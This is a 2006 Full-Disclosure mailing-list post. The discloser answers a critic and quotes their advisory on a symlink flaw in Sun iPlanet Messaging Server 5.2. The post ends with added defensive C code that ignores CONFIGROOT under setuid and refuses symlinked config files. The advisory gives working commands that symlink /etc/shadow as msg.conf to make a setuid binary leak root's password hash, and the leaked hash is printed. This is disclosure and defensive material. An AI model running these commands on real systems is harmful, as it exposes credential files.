Date: Sat Jun 17 21:26:13 2006
From: very at unprivate.com (php0t)
Subject: [Fwd: Re: Sun iPlanet Messaging Server 5.2 root password compromise]

Excuse me, but what have I done to you? And why am I only supposed to disclose bugs when somebody pays me for it? Can you please explain your rant, so next time I can do -whatever- different?

And by the way, I'm not 'trying to prove I can find holes', I didn't spend any time trying to find a hole in this specific software, I just happened to stumble upon it in the process of trying to gain root - after which I decided to disclose this silly and obvious bug.

So I ask again, is this a problem for you? Am I being ignorant / evil for posting this vuln? Just tell me what's up - If your problem is that I do not get paid for this - well - I am happy that you are so much after what's best for me but I can do fine on my own - thanks.

php0t / zorro.hu

> You are wasting your time trying to prove you can find holes in software that you AREN'T *PAID FOR* FINDING BUGS.
> Nice advisory, though. you spend time on it.
> Sincerely,
> T.Solo

php0t wrote:
> Summary
> ----------------
> Date: 14 Jun 2006
> Vendor: Sun Microsystems, Inc.
> Name: iPlanet Messaging Server
> Version: 5.2 HotFix 1.16 (built May 14 2003)
> Vuln: msg.conf symlink attack
> Severity: high
>
>
> Software description
> ----------------
> The iPlanet Messaging Server is a software product that provides a
> centralized location for the exchange of information through the
> sending and receiving of messages. The product is designed for
> telecommunications providers, service providers, and enterprises that
> offer messaging capabilities to employees, partners, and customers.
> The iPlanet Messaging Server delivers a Web-based messaging platform
> capable of serving tens of millions of users, and also provides
> value-added differentiated services, including outsourcing, wireless,
> and unified messaging services.
>
>
> Vulnerability description
> ----------------
> Setuid programs part of the iPlanet Messaging Server try to read the
> configuration file msg.conf. If the environment variable CONFIGROOT is
> set, the configuration is read from that directory.
> A symlink attack is possible, and as a result it is possible to read the
> first line of any file with uid=0.
>
>
> Example
> ----------------
> test@...box:/tmp$ /iplanet/iMS5/bin/msg/imta/bin/version
> iPlanet Messaging Server 5.2 HotFix 1.16 (built May 14 2003)
> libimta.so 5.2 HotFix 1.16 (built 12:32:17, May 14 2003) SunOS sunbox
> 5.9 Generic_118558-22 sun4u sparc SUNW,Sun-Fire-280R Solaris
> test@...box:/tmp$
> test@...box:/tmp$ ls -la /iplanet/iMS5/bin/msg/imta/bin/pipe_master
> -rws--s--x 1 root mail 446864 Sep 22 2005
> /iplanet/iMS5/bin/msg/imta/bin/pipe_master
> test@...box:/tmp$
> test@...box:/tmp$ ln -s /etc/shadow msg.conf
> test@...box:/tmp$
> test@...box:/tmp$ export CONFIGROOT=.
> test@...box:/tmp$
> test@...box:/tmp$ /iplanet/iMS5/bin/msg/imta/bin/pipe_master
> [14/Jun/2006:11:13:49 +0200] sunbox [119]: General Error:
> func=_configdrv_file_readoption; error=option name should be followed by
> '='; line=root:qW1HFEa1MCD0w:11821::::::
> ERROR: Configuration database initialization failed - see default
> logfile
> test@...box:/tmp$
>
>
> Vulnerable
> ----------------
> iPlanet Messaging Server 5.2 HotFix 1.16 (built May 14 2003)
>
> php0t / zorro.hu
> www.zorro.hu
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
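
The advisory quoted above comes down to a setuid binary trusting CONFIGROOT and following a symlink named msg.conf. The following is an added defensive example, not part of the original post and not Sun's code: it ignores the variable when the process runs with elevated ids and refuses symlinks and untrusted owners when opening the file. The default path and all function names are assumptions.

```c
#define _POSIX_C_SOURCE 200809L
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

#define DEFAULT_CONFIGROOT "/etc/example-msg"  /* hypothetical compiled-in path */

/* Primary fix: honour CONFIGROOT only when no privilege was gained via setuid/setgid. */
const char *config_root(void) {
    const char *env = getenv("CONFIGROOT");
    if (env && getuid() == geteuid() && getgid() == getegid())
        return env;
    return DEFAULT_CONFIGROOT;
}

/* Defence in depth: open dir/msg.conf, refusing a symlink in the final path
 * component, non-regular files and files not owned by trusted_uid.
 * Returns an open fd, or -1 without echoing any file content. */
int open_config(const char *dir, uid_t trusted_uid) {
    char path[512];
    struct stat st;
    int n = snprintf(path, sizeof path, "%s/msg.conf", dir);
    if (n < 0 || n >= (int)sizeof path) return -1;
    int fd = open(path, O_RDONLY | O_NOFOLLOW);  /* ELOOP if msg.conf is a symlink */
    if (fd < 0) return -1;
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode) || st.st_uid != trusted_uid) {
        close(fd);
        return -1;
    }
    return fd;
}

/* Constructed demo: a regular msg.conf is accepted, a symlinked one is rejected. */
int demo(void) {
    char good[] = "/tmp/cfgokXXXXXX", bad[] = "/tmp/cfgbadXXXXXX";
    char target[512], lnk[512];
    if (!mkdtemp(good) || !mkdtemp(bad)) return -1;
    snprintf(target, sizeof target, "%s/msg.conf", good);
    snprintf(lnk, sizeof lnk, "%s/msg.conf", bad);
    FILE *f = fopen(target, "w");
    if (!f) return -1;
    fputs("option=value\n", f);
    fclose(f);
    if (symlink(target, lnk) != 0) return -1;
    int ok = open_config(good, geteuid());  /* regular file: valid fd */
    int no = open_config(bad, geteuid());   /* symlink: -1 */
    if (ok >= 0) close(ok);
    return (ok >= 0 && no == -1) ? 0 : 1;
}
int main(void) { return demo(); }
```

O_NOFOLLOW only covers the last path component, which is why the environment check in config_root() is the primary control and the open-time checks are a second layer.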